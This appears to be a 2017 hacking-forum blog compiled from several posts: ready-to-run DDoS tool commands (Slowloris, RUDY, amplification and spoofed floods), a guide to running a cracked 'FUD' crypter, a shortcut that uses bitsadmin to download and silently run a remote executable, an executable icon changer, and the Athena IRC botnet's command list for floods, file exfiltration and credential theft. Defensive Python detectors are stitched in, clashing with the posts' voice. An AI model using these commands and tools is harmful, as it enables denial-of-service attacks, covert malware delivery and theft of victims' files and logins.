Tuesday, June 20, 2017

DDoS Scripts [Layer 7 & 4]

Hello Everybody,

I am giving you all my DDoS scripts using Layer 7 & Layer 4 attacks.
Please give a like as I worked very hard to bring you these scripts!
Thanks, enjoy!

Layer 7

1: ARME (For Apache Servers) 

./arme 127.0.0.1 5000 proxies.txt 3600 0

2: GHP (Get / Head / Post )

./ghp 127.0.0.1 GET 5000 proxies.txt 3600 0 %random%

3: Hulk (Python)


python hulk.py 127.0.0.1

4: Rand (Perl)

perl rand.pl 127.0.0.1 3600

5: R.U.D.Y

./rudy 127.0.0.1 1 5000 proxies.txt 3600 0 %random%

6: SlowLoris

./slow 127.0.0.1 5000 proxies.txt 3600 0

7: XML-RPC Pingback (Perl) 

perl xml.pl 127.0.0.1 10000 xmlrpc.txt 3600

8: XML-RPC Pingback (PHP) 


php xml.php xml.txt 10000

9: 007 Goldeneye 


python 007.py 127.0.0.1

Layer 4

1: DNS AMP (UDP) 


./amp 127.0.0.1 80 amp.txt 2 3600 

2: CHARGEN


./chargen 127.0.0.1 80 chargen.txt 2 -1 3600 

3: TCP (Advanced ESSYN)


./tcp 127.0.0.1 80 2 -1 3600 

4: SNMP (Python Version)


./snmp -t 127.0.0.1 -f snmp.txt -l 30

5: Spoofed UDP 


./sudp 127.0.0.1 80 5 5 3600

6: NTP (Python)


python ntp.py 127.0.0.1 ntp.txt 5

7: NTP (Perl)


perl ntp.pl 127.0.0.1 80 3600 ntp.txt 5

8: DrDos 


perl drdos.pl 127.0.0.1 80 servers.txt 5 tcp 10 3600


I didn't code any of these scripts.

Monday, June 19, 2017

TRILLIUM CRYPT RELOADED |FUD|NO DEPENDENCY|POLYMORPHIC|PROTECT PROCESS|Anti-MemScan



- Download this pack
- Unzip it into one folder
- Open the "OCX files" folder and run the exe
- Go to the hosts file (c:\windows\system32\drivers\etc) and add "127.0.0.1 electronicarts.pe.hu"
- Open HWID READER.exe
- Generate the HWID with a random name (doesn't matter) and copy just the HWID (the alphanumeric part, like "BFEBFBFF000006FB1653284762")
- Paste it into hwid.txt in the "area" folder
- Open mongoose, which you will find in the rar
- Right-click the icon in the system tray and click Advanced settings
- Change listening_port to 80
- Restart mongoose
- Open the program and enjoy it!

I'm not 100% sure about the genuineness of the file I was provided; it could or could not be infected by the same crypter. I used a VM to crack it, so be careful and use one too!

DOWNLOAD AND EXECUTE (NEW METHOD 100% FUD)

It seems I'm the first who found such a method to download and execute any file.
It was very obvious, but it seems nobody ever thought about it.
First of all here is a demonstration video on youtube :


How does it work?

Well, it simply uses a shortcut to start a new Windows shell (cmd.exe) with two commands:

  • One to download a remote file
  • A second to execute the temporarily downloaded file

Do it manually:
Just create a new shortcut from your desktop, then enter the following target (the switch is /transfer, and the whole command after /C must be quoted):
cmd.exe /C "%windir%\system32\bitsadmin.exe /transfer downloader /priority normal http://example.com/test.exe %temp%\tmp.exe & %temp%\tmp.exe"
As you can see, the shortcut runs the Microsoft tool bitsadmin with /transfer, which creates a BITS download job (named "downloader" here) that fetches the remote file and stores it in the temp folder.

Then it runs it.

It is not finished yet: now set the shortcut's "Run" option to Minimized so the console window is not visible.

And you can change the icon to anything you want (better to use an icon index from shell32.dll, located in the system32 folder).

Have fun !

You can do lots of interesting things with bitsadmin; I have many other methods for file downloading using this technique and will write other examples later :)

Do it automatically (Lazy method):

As in the above video, download the attached application and voilà!
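The chain described above (cmd.exe launching bitsadmin /transfer, then the file it just wrote) is exactly what a defender sees in process-creation telemetry, and BITS itself also logs every job in Microsoft-Windows-Bits-Client/Operational. As an added example that is not part of the original post, here is a small Python detector run over constructed Sysmon-style records; the field names, user paths and the "downloader" job name are assumptions mirroring the shortcut target above, not captured data.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields
# (Image, ParentImage, CommandLine). Sample data, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    # the shortcut from the post: cmd.exe runs bitsadmin, then the downloaded file
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd.exe /C "C:\Windows\system32\bitsadmin.exe /transfer downloader '
                    r'/priority normal http://example.com/test.exe '
                    r'C:\Users\alice\AppData\Local\Temp\tmp.exe & C:\Users\alice\AppData\Local\Temp\tmp.exe"'},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\system32\bitsadmin.exe /transfer downloader /priority normal "
                    r"http://example.com/test.exe C:\Users\alice\AppData\Local\Temp\tmp.exe"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\tmp.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\tmp.exe"},
    # benign administrative use of bitsadmin: no /transfer, no URL
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "bitsadmin.exe /list /allusers"},
]

# bitsadmin /transfer <jobname> [options] <http(s) URL> <local destination>
BITS_TRANSFER = re.compile(
    r'bitsadmin(?:\.exe)?\s+/transfer\b.*?(https?://\S+)\s+"?([^\s"]+)',
    re.IGNORECASE)


def parse_bits_download(cmdline):
    """Return (url, destination) if cmdline is a bitsadmin /transfer download, else None."""
    m = BITS_TRANSFER.search(cmdline)
    return (m.group(1), m.group(2)) if m else None


def detect_download_execute(events):
    """Flag BITS downloads and any later execution of the file they wrote.

    Returns a list of (event_index, rule, detail) tuples. Paths are compared
    case-insensitively because Windows paths are.
    """
    findings = []
    downloaded = set()  # destination paths written by bitsadmin /transfer so far
    for i, ev in enumerate(events):
        cmd = ev.get("CommandLine", "")
        image = ev.get("Image", "").lower()
        hit = parse_bits_download(cmd)
        if hit:
            url, dest = hit
            downloaded.add(dest.lower())
            findings.append((i, "bits_download", url))
            # destination named twice on one line ("... <dest> & <dest>") runs it inline
            if cmd.lower().count(dest.lower()) >= 2:
                findings.append((i, "download_and_execute_inline", dest))
        elif image in downloaded:
            findings.append((i, "downloaded_file_executed", image))
    return findings


if __name__ == "__main__":
    for idx, rule, detail in detect_download_execute(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {detail}")
```

The inline rule catches the one-liner form used by the shortcut even when the later process-creation event is missed; the second rule catches the same chain when the download and the execution are separate commands. In practice you would key the `downloaded` set by host and expire it, since a user can legitimately run bitsadmin once and never execute the result.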



[RELEASE] DARKZONE ICON CHANGER | 2 METHODS! [STABLE]

Hello. I just made this simple icon changer using Delphi. It has 2 methods, to support all executable files!
And of course it has no dependencies to run, so it will work on all Windows machines.

DarkZone Icon Changer is a tool that helps you customize the icon of an executable file (.exe).


VirusTotal scan (false positive, don't worry!)
https://www.virustotal.com/en/file/693e855b907fd2825806f56eb493581494f03bb72cfb30d8a460673ba7632d03/analysis/1481853463/

How to use:
--------------------------------------
1- Choose an executable file (.exe)
2- Choose an icon file (.ico)
3- Choose the icon replacing method (sometimes method 1 doesn't work, so choose 2 and vice versa!)
4- Click Apply to make the changes!
--------------------------------------

Download:
DarkZone - Icon Changer.rar
Rar Password: DarkZ0Ne.NET


Always check these MD5 and SHA1 hashes of DarkZone Icon Changer.exe to make sure it's legit and not infected by other users/websites. ^^
DarkZone Icon Changer.exe
MD5:F324AAB79F80F9BE3261CD5F5D36AA41
SHA1:56E968FD8FFD32B3BAB9A80264E1DFE9681E69DC

Enjoy ^^.
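Checking the published hashes before running a download is the right instinct. As an added example (not the poster's code), the Python below streams a file through MD5, SHA-1 and SHA-256 in one pass and compares the result with a published set. The sample file it writes is constructed bytes, not the real tool, so against the post's hashes it reports a mismatch, which is exactly what a tampered or re-iconed copy looks like. SHA-256 is included because MD5 and SHA-1 are no longer collision resistant; and note that a match only proves you have the same file the poster hashed, not that the file is clean.

```python
import hashlib
import os
import tempfile

# Hashes published in the post for the unmodified DarkZone Icon Changer.exe.
PUBLISHED = {
    "md5": "F324AAB79F80F9BE3261CD5F5D36AA41",
    "sha1": "56E968FD8FFD32B3BAB9A80264E1DFE9681E69DC",
}


def file_digests(path, algorithms=("md5", "sha1", "sha256"), chunk_size=1 << 16):
    """Hash a file once, streaming, for every requested algorithm."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            for h in hashers.values():
                h.update(block)
    return {name: h.hexdigest() for name, h in hashers.items()}


def verify_file(path, expected):
    """Compare a file against published hex digests (case-insensitive).

    Returns {algorithm: matched}. Every value must be True before you trust that
    the file is the one that was hashed; any False means a different file.
    """
    actual = file_digests(path, tuple(expected))
    return {name: actual[name] == digest.strip().lower()
            for name, digest in expected.items()}


def make_sample_file(tamper=False):
    """Write constructed bytes (a fake 'executable') to a temp file.

    Returns (path, expected) where expected holds the digests of the untampered
    content, so verify_file on a tampered copy reports a mismatch.
    """
    data = b"MZ" + b"\x90" * 62 + b"PE\0\0constructed sample, not a real PE\n"
    expected = {n: hashlib.new(n, data).hexdigest() for n in ("md5", "sha1", "sha256")}
    if tamper:
        data = data[:-1] + b"!"  # flip one byte: every digest changes
    fd, path = tempfile.mkstemp(suffix=".exe")
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path, expected


if __name__ == "__main__":
    path, expected = make_sample_file()
    print("clean copy:   ", verify_file(path, expected))
    print("vs published: ", verify_file(path, PUBLISHED))
    os.remove(path)
```

Run it against the real download by calling `verify_file("DarkZone Icon Changer.exe", PUBLISHED)`; both values must be True, and the SHA-256 from `file_digests` is the value worth recording for your own records.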

Sunday, June 18, 2017

Athena IRC Builder v2.4.0


Features of Athena
 - 10 Intense methods of DDoS
 - Anti-botkiller
 - Independent; requires no .NET framework or any 3rd party libraries
 - File searching and stealing system
 - SmartView (system for giving realistic looking views to your website or the like - ads, youtube, etc)
 - IRC War Attacks/Flooding
 - Multiple (different) methods of startup (registry and non-registry)
 - File, registry, and process persistence
 - Botkill (active botkilling, scans based on heuristics)

IRC Related Commands
!irc.join #channel [key] - Joins a channel
!irc.part #channel - Parts a channel
!irc.raw - Submit a RAW IRC command
!irc.reconnect - Reconnects to IRC after waiting 15 seconds
!irc.silent on/off - Toggles bot output to channel
!irc.sort.country - Separates bots based on location
!irc.sort.privileges - Separates bots based on Admin/User privileges
!irc.sort.gender - Separates laptops and desktops
!irc.sort.os - Separates bots based on operating system
!irc.sort.architecture - Separates bots based on architecture
!irc.sort.dotnet - Separates bots by version of .NET Framework installed

DDoS Commands
[Port 80 is most common for websites]
!ddos.http.slowloris - Attacks a target webserver with many concurrent connections
!ddos.http.rapidget - Sends mass amounts of randomized GET packets to a given target
!ddos.http.rudy - Slowly posts content by the masses to a target webserver
!ddos.http.rapidpost - Sends mass amounts of randomized POST packets to a given target
!ddos.http.slowpost – Holds many concurrent connections to a webserver through POST methods
!ddos.http.arme - Abuses partial content headers in order to harm a target webserver
!ddos.http.bandwidth - A download-based flood targeted towards larger files and downloadable content on websites
!ddos.layer4.udp - Sends mass amounts of packets containing random data to a target host/ip
!ddos.layer4.ecf - Floods a target with rapid connections and disconnections (Previously named condis) (ECF stands for Established Connection Flooding)
!ddos.stop - Ends any currently running DDoS
(Example: !ddos.http.rapidget http://website.com/ 80 300)

!ddos.browser http://website.com/ 60 - Floods a website through html scripts and hidden browsers. Effective against sites heavy on browser based scripts.
!ddos.browser.stop - Ends any currently running Browser Based DDoS

!http.hostblock website.com - Blocks a host
!http.status http://website.com/ - Outputs the current status of a given URL (ie. 200 OK, 302 Found, 404 Not Found, etc)


File Searching, Stealing, and Modification Commands
!ftp.upload C:\Archive.rar ftphost.com ftpuser ftppass - Uploads a given file to a given FTP server
!filesearch .exe - Searches the entire bot computer for a given file name or piece of a file name, and outputs how many instances of it occurred
!filesearch.output .rar - Functionality is the same as above, but the bot outputs the file path of the searched item
!filesearch.stop - Ends any of the existing three above types of file searches

Website View Commands
!view http://website.com/ - Views a given website in a random existing browser visibly
!view.hidden http://website.com/ - Views a given website in a random existing browser hidden
!smartview.add http://website.com/ 1080 300 - Adds a given URL to the 'SmartView' queue
!smartview.del http://website.com/ - Deletes a given URL from the 'SmartView' queue if it exists
!smartview.clear - Clears the entire 'SmartView' queue

Recovery Commands
!recovery.ftp – Outputs existing FTP logins on the bot computer
!recovery.im – Outputs existing IM logins on the bot computer

IRC War Commands
!war.connect irc.server.net 6667 – Connects to a given IRC in multiple sockets
!war.disconnect – Disconnects from a previously connected to IRC
!war.status – Outputs the amount of verified connections to IRC and the status of what the bot is currently doing
!war.raw PRIVMSG #channel :raw message – Submits a RAW IRC command
!war.join #channel channelkey – Joins a channel with an optional key
!war.part #channel part message – Parts a channel with an optional part message
!war.msg user/#channel message here – Sends a message to a given user or channel
!war.notice user/#channel message here – Sends a notice to a given user or channel
!war.invite user – Invites a user to a random channel. Clients that have auto-join on invite are affected badly
!war.ctcp user – Floods a user with CTCP requests. This often disconnects users
!war.dcc user – Floods a user with DCC requests. This often disconnects users
!war.kill.user nickname – Attempts to kill a user from IRC
!war.kill.user.multi nick1 nick2 nick3 - Attempts to kill a list of users from IRC
!war.flood.channel #channel – Floods a given channel
!war.flood.channel.hop #channel – Floods a channel through mass joins and parts
!war.flood.anope – Floods Anope services. Anope will crash if enough bots are used.
!war.stop – Stops an existing flood
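Every Athena command above reaches the bot as an IRC PRIVMSG whose text begins with "!", so the command grammar doubles as a detection signature for IRC traffic leaving a host. The Python below is an added example (not Athena's code or anything from the post): it parses IRC lines, keeps only commands in the families listed above, and tags the ones that harm third parties or steal data. The nicks, channel and host names in the sample lines are constructed.

```python
import re

# Command families from the Athena list above, mapped to what they do on the victim.
ATHENA_FAMILIES = {
    "irc": "bot management",
    "ddos": "denial of service",
    "http": "bot management",
    "ftp": "file exfiltration",
    "filesearch": "file search and theft",
    "view": "hidden browsing / view fraud",
    "smartview": "view fraud",
    "recovery": "credential theft",
    "war": "IRC flooding",
}
HIGH_IMPACT = {"ddos", "ftp", "filesearch", "recovery", "war"}

# :nick!user@host PRIVMSG <target> :<text>
IRC_PRIVMSG = re.compile(
    r"^:(?P<nick>[^!\s]+)(?:!\S*)?\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")


def parse_athena_command(line):
    """Return a dict describing an Athena bot command carried in an IRC PRIVMSG, else None."""
    m = IRC_PRIVMSG.match(line.rstrip("\r\n"))
    if not m:
        return None
    text = m.group("text").strip()
    if not text.startswith("!"):
        return None
    parts = text[1:].split()
    if not parts:
        return None
    command = parts[0]
    family = command.split(".", 1)[0].lower()
    if family not in ATHENA_FAMILIES:
        return None
    return {
        "nick": m.group("nick"),
        "target": m.group("target"),
        "command": command,
        "args": parts[1:],
        "family": family,
        "purpose": ATHENA_FAMILIES[family],
        "high_impact": family in HIGH_IMPACT,
    }


def scan_irc_log(lines):
    """Run the parser over captured IRC lines and keep only bot commands."""
    return [r for r in (parse_athena_command(l) for l in lines) if r]


# Constructed IRC traffic, in the style of what a bot would receive. Not a real capture.
SAMPLE_IRC_LINES = [
    ":herder!h@c2.example PRIVMSG #bots :!ddos.http.rapidget http://website.com/ 80 300",
    ":herder!h@c2.example PRIVMSG #bots :!recovery.ftp",
    ":alice!a@host.example PRIVMSG #chat :hello everyone",
    ":herder!h@c2.example PRIVMSG #bots :!irc.sort.os",
    ":herder!h@c2.example PRIVMSG #bots :!war.flood.anope",
    "PING :irc.example.net",
]

if __name__ == "__main__":
    for hit in scan_irc_log(SAMPLE_IRC_LINES):
        flag = "HIGH" if hit["high_impact"] else "info"
        print(f"[{flag}] {hit['nick']} -> {hit['target']}: {hit['command']} "
              f"{hit['args']} ({hit['purpose']})")
```

Feed it the reassembled TCP payload of any outbound connection on an IRC port (6667 is used in the !war.connect example above, but bots are routinely pointed at other ports); a single high-impact hit from an unfamiliar channel is enough to pull the host for triage, and the parsed args tell you which site was about to be flooded.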